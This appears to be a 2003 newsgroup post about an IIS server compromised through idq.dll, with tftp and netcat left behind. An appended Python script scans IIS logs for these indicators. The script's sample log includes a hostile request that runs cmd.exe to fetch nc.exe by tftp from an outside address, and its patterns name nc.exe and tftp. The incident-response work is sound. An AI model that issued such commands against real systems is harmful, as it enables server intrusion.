hacktool.iis.exploit

From: pepe (anonymous_at_discussions.microsoft.com)
Date: 11/26/03

Date: Wed, 26 Nov 2003 07:46:38 -0800

I have a Windows 2000 Server SP4 and patched with all
security updates as of Saturday, November 22. IIS is
running on this machine. Monday, we received a Norton AV
message that idq.dll was infected with
hacktool.iis.exploit. Subsequently, several other files
(4) were also found to be infected. All were reported to
be quarantined with real-time scan. A couple of them have
the tftpxxx file names. We searched for information at
that time on this particular Trojan and found nothing
anywhere except an item on Symantec that says that it is
covered under their latest definitions. Tuesday, we had an
email application running slow. We found nc.exe (which we
believe to be netcat, a port scanning util) running the CPU
pretty hard. We couldn't run a manual scan of NAV because
the local drive was full. It isn't a big drive but it
wasn't full before. We were able to map the local drive of
this computer from another and run a scan from the second
PC to the first, and it found two infected files that
Norton left alone. So we took the server offline.

We ran NAV in safe-mode and nothing was reported. We are
also now able to run NAV from Windows and nothing is
reported. This was done with no network connectivity.

We are guessing that after the Trojan infected the
machine, it installed a tftp program and ran netcat. After
that we don't know what else could have happened.

I'm leaving the questions wide open. What would be our
next plan of action? What should we look at to determine
what activity was done?

Thanks for your time.
pepe
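One concrete place to start answering "what activity was done" is the IIS request log (W3C extended format, typically under the server's LogFiles\W3SVCn folder), since the indicators named above (idq.dll, tftp, nc.exe) will usually show up in the requests that delivered them. The triage script below is an added example, not code from the poster or from Symantec; the log lines, IP addresses and timestamps in it are constructed for illustration.

```python
"""Triage helper: scan IIS W3C extended log lines for requests that match
the indicators in the post (idq.dll, tftp, nc.exe, cmd.exe) and build a
first-seen timeline per client IP. Added example; sample data is constructed."""
import re

# Constructed sample log in IIS W3C extended format (hypothetical IPs/times).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2003-11-24 03:12:07 203.0.113.5 GET /default.htm - 200
2003-11-24 03:12:09 203.0.113.5 GET /scripts/idq.dll AAAAAAAAAAAAAAAAAAAAAAAA 200
2003-11-24 03:13:41 203.0.113.5 GET /scripts/cmd.exe /c+tftp+-i+203.0.113.5+GET+nc.exe 502
2003-11-24 08:02:10 198.51.100.7 GET /index.htm - 200
"""

# Indicator patterns taken from the post; matched against stem + query.
SUSPICIOUS = [
    ("idq.dll request", re.compile(r"idq\.dll", re.I)),
    ("tftp in request", re.compile(r"\btftp\b", re.I)),
    ("nc.exe in request", re.compile(r"\bnc\.exe\b", re.I)),
    ("cmd.exe via IIS", re.compile(r"cmd\.exe", re.I)),
]

def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]        # column names follow the tag
            continue
        if not line or line.startswith("#"):
            continue                         # other directives / blank lines
        parts = line.split(" ")
        if fields and len(parts) == len(fields):
            yield dict(zip(fields, parts))

def find_suspicious(text):
    """Return (timestamp, client ip, reason, uri) for every matching record."""
    hits = []
    for rec in parse_w3c(text):
        uri = rec["cs-uri-stem"] + "?" + rec["cs-uri-query"]
        for reason, rx in SUSPICIOUS:
            if rx.search(uri):
                hits.append((rec["date"] + " " + rec["time"], rec["c-ip"], reason, uri))
    return hits

def first_seen_by_ip(hits):
    """Earliest suspicious timestamp per client IP: the start of the timeline."""
    first = {}
    for ts, ip, _, _ in hits:
        first[ip] = min(first.get(ip, ts), ts)
    return first

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(*hit)
    print(first_seen_by_ip(find_suspicious(SAMPLE_LOG)))
```

Run it against the real log files copied off the (offline) server rather than the originals, and use the first-seen timestamps to bound the window for file-system and event-log review.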
